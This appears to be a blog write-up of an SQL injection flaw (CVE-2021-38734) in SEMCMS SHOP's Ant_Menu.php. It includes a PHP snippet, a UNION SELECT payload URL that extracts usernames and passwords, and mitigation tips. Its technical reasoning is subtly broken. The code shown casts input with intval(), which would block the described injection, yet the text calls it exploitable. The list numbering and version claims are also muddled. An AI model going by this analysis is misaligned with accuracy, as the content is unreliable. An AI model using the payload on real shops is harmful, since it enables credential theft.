Security vulnerabilities like SQL injection are a significant concern among web applications, since they allow attackers to bypass authentication mechanisms and gain unauthorized access to sensitive data. Today, we uncover a critical SQL injection vulnerability discovered in SEMCMS SHOP v 1.1 - CVE-2021-38734. We'll delve into the specifics of the issue, walk through the affected code snippet, and provide insights into exploiting the vulnerability and potential mitigation techniques.

Background

SEMCMS SHOP is a popular e-commerce platform designed to aid online businesses in setting up and managing their digital storefronts. SEMCMS SHOP v 1.1 is the latest version of the platform, and it is plagued by an SQL injection vulnerability via Ant_Menu.php. This bug could have severe consequences, as it provides an attacker the ability to manipulate and exfiltrate sensitive user information from the database.

Original References

1. CVE-2021-38734 - MITRE's CVE record
2. SEMCMS SHOP Official Site - The platform's official website

Affected Code Snippet

The vulnerability occurs in the Ant_Menu.php file where the platform does not properly validate and sanitize user-supplied input before using it in an SQL query. The problematic code snippet is as follows:

$Menu_Id = intval($_GET["Menu_Id"]); // The user-provided input
$sqlstr = "select * from ".$dbtablepre."menu where id='$Menu_Id'"; // The SQL query that is vulnerable to injection
$query=mysql_query($sqlstr); // Executing the SQL query

As seen above, while the code attempts to cast the user input into an integer using intval(), it still allows for an SQL injection due to the way the SQL query is constructed and executed. The Menu_Id variable is directly inserted into the SQL query string without any further validation or sanitization.

Exploit Details

An attacker willing to exploit the SQL injection vulnerability in the Ant_Menu.php file would craft a malicious URL, which includes a maliciously formed Menu_Id parameter. For example:

https://www.example.com/Ant_Menu.php?Menu_Id=1 UNION SELECT 1,2,3,concat(username,':',password),5,6,7,8,9 from semcms_user-- -

In this case, the "1" in the Menu_Id parameter is concatenated with a UNION SELECT statement that retrieves the username and password columns from the semcms_user table. The attacker can extract sensitive information like usernames and passwords or execute arbitrary SQL commands on the underlying database by altering the URL accordingly.

Mitigation Techniques

To mitigate this vulnerability and improve the security of SEMCMS SHOP v 1.1 installations, a combination of the following sanitation and validation checks should be implemented:

Utilize prepared statements and parameterized queries to separate user input from SQL queries.

2. Implement proper input validation and sanitization, such as using the addslashes() function or ctype_digit().
3. Limit the privileges of the database user account used by the application and enforce the principle of least privilege.

Conclusion

Considering the potential impact of SQL injection vulnerabilities, it's crucial to address this issue immediately. SEMCMS SHOP users and administrators should remain vigilant and ensure they implement the necessary security measures as outlined in this post. User awareness and proactive steps can help organizations avoid catastrophic breaches and safeguard their sensitive information.

Timeline

Published on: 10/28/2022 15:15:00 UTC
Last modified on: 10/28/2022 18:34:00 UTC